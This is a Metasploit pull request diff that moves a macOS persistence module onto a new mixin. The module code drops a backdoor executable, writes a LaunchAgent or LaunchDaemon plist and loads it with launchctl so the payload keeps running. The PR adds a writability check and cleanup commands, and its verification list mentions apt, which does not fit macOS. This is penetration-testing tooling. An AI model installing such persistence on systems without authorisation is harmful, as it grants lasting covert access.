### PR TITLE
update plist persistence to mixin

### DIFF
--- a/modules/exploits/osx/persistence/launch_plist.rb
+++ b/modules/exploits/osx/persistence/launch_plist.rb
@@ -96,8 +96,8 @@ class MetasploitModule < Msf::Exploit::Local
     # Add plist file to LaunchAgents dir
     add_launchctl_item
     @clean_up_rc << "rm #{plist_path}\n"
-    @clean_up_rc << "execute -f /bin/launchctl -a \"remove  #{File.basename(backdoor_path)}\"\n"
     @clean_up_rc << "execute -f /bin/launchctl -a \"stop  #{File.basename(backdoor_path)}\"\n"
+    @clean_up_rc << "execute -f /bin/launchctl -a \"remove  #{File.basename(backdoor_path)}\"\n"\
   end
 
   private

--- a/modules/exploits/osx/persistence/launch_plist.rb
+++ b/modules/exploits/osx/persistence/launch_plist.rb
@@ -95,8 +95,9 @@ class MetasploitModule < Msf::Exploit::Local
     write_backdoor(payload_bin)
     # Add plist file to LaunchAgents dir
     add_launchctl_item
-    # tell the user how to remove the persistence if necessary
-    list_removal_paths
+    @clean_up_rc << "rm #{plist_path}\n"
+    @clean_up_rc << "execute -f /bin/launchctl -a \"remove  #{File.basename(backdoor_path)}\"\n"
+    @clean_up_rc << "execute -f /bin/launchctl -a \"stop  #{File.basename(backdoor_path)}\"\n"
   end
 
   private
@@ -163,16 +164,6 @@ class MetasploitModule < Msf::Exploit::Local
   # @return [Boolean] user wants the persistence to be restarted constantly if it exits
   def keepalive?
     datastore['KEEPALIVE']
-  end
-
-  # useful if you want to remove the persistence.
-  # prints out a list of paths to remove and commands to run.
-  def list_removal_paths
-    removal_command = "rm -rf #{File.dirname(backdoor_path).shellescape}"
-    removal_command << " ; rm #{plist_path}"
-    removal_command << " ; launchctl remove #{File.basename(backdoor_path)}"
-    removal_command << " ; launchctl stop #{File.basename(backdoor_path)}"
-    print_status("To remove the persistence, run:\n#{removal_command}\n")
   end
 
   # path to the LaunchAgent service configuration plist

--- a/modules/exploits/osx/persistence/launch_plist.rb
+++ b/modules/exploits/osx/persistence/launch_plist.rb
@@ -11,6 +11,10 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Common
   include Msf::Post::File
   include Msf::Exploit::EXE
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/osx/local/persistence'
 
   def initialize(info = {})
     super(
@@ -23,13 +27,15 @@ class MetasploitModule < Msf::Exploit::Local
           upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with
           elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.
           In either case the plist entry specifies an executable that will be run before or at login.
+
+          Verified on OSX 11.7.10 (Big Sur)
         },
         'License' => MSF_LICENSE,
         'Author' => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", 'joev' ],
         'Targets' => [
           [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
           [ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
-          ['Mac OS X Apple Sillicon', { 'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
+          [ 'Mac OS X Apple Sillicon', { 'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
           [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
           [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
         ],
@@ -38,13 +44,14 @@ class MetasploitModule < Msf::Exploit::Local
         'DisclosureDate' => '2012-04-01',
         'Platform' => [ 'osx', 'python', 'unix' ],
         'References' => [
-          'https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf',
-          'https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html'
+          ['URL', 'https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf'],
+          ['URL', 'https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html'],
+          ['ATT&CK', Mitre::Attack::Technique::T1647_PLIST_FILE_MODIFICATION]
         ],
         'Notes' => {
-          'Reliability' => UNKNOWN_RELIABILITY,
-          'Stability' => UNKNOWN_STABILITY,
-          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, SCREEN_EFFECTS] # Pop-up on 13.7.4
         }
       )
     )
@@ -61,9 +68,19 @@ class MetasploitModule < Msf::Exploit::Local
                   [false, 'Run the installed payload immediately.', false]),
       OptEnum.new('LAUNCH_ITEM', [true, 'Type of launch item, see description for more info. Default is LaunchAgent', 'LaunchAgent', %w[LaunchAgent LaunchDaemon]])
     ])
+    deregister_options('WritableDir')
   end
 
-  def exploit
+  def check
+    folder = File.dirname(backdoor_path).shellescape
+    folder = File.dirname(folder)
+    return CheckCode::Safe("#{folder} not found") unless exists?(folder)
+    return CheckCode::Safe("#{folder} not writable") unless writable?(folder)
+
+    CheckCode::Appears("#{folder} is writable")
+  end
+
+  def install_persistence
     check_for_duplicate_entry
 
     if target['Arch'] == ARCH_PYTHON
@@ -89,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Local
     label = File.basename(backdoor_path)
     cmd_exec("mkdir -p #{File.dirname(plist_path).shellescape}")
     # NOTE: the OnDemand key is the OSX < 10.4 equivalent of KeepAlive
-    item = <<-EOI
+    item = <<-EOF
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
     <plist version="1.0">
@@ -110,16 +127,19 @@ class MetasploitModule < Msf::Exploit::Local
         <#{keepalive?}/>
       </dict>
     </plist>
-    EOI
+    EOF
 
     if write_file(plist_path, item)
       print_good("LaunchAgent added: #{plist_path}")
+      @clean_up_rc << "rm #{plist_path}\n"
     else
       fail_with(Failure::UnexpectedReply, "Error writing LaunchAgent item to #{plist_path}")
     end
 
     if run_now?
       cmd_exec("launchctl load -w #{plist_path.shellescape}")
+    else
+      print_warning("To manually launch payload: launchctl load -w #{plist_path.shellescape}")
     end
 
     print_good('LaunchAgent installed successfully.')
@@ -180,6 +200,7 @@ class MetasploitModule < Msf::Exploit::Local
     if write_file(backdoor_path, exe)
       print_good("Backdoor stored to #{backdoor_path}")
       cmd_exec("chmod +x #{backdoor_path.shellescape}")
+      @clean_up_rc << "rm #{backdoor_path}\n"
     else
       fail_with(Failure::UnexpectedReply, "Error dropping backdoor to #{backdoor_path}")
     end


### PR DESCRIPTION
Updates `persistence` to the new persistence mixin, and changing the name to be more descriptive. Part of #20374


## Verification

- [ ] Start `msfconsole`
- [ ] exploit the box somehow (`ssh_login` for instance)
- [ ] `use exploit/osx/persistence/launch_plist`
- [ ] `set SESSION <id>`
- [ ] `exploit`
- [ ] **Verify** persistence is created, and you get a new session if apt is run
- [ ] **Verify** cleanup works
- [ ] **Document** is updated and correct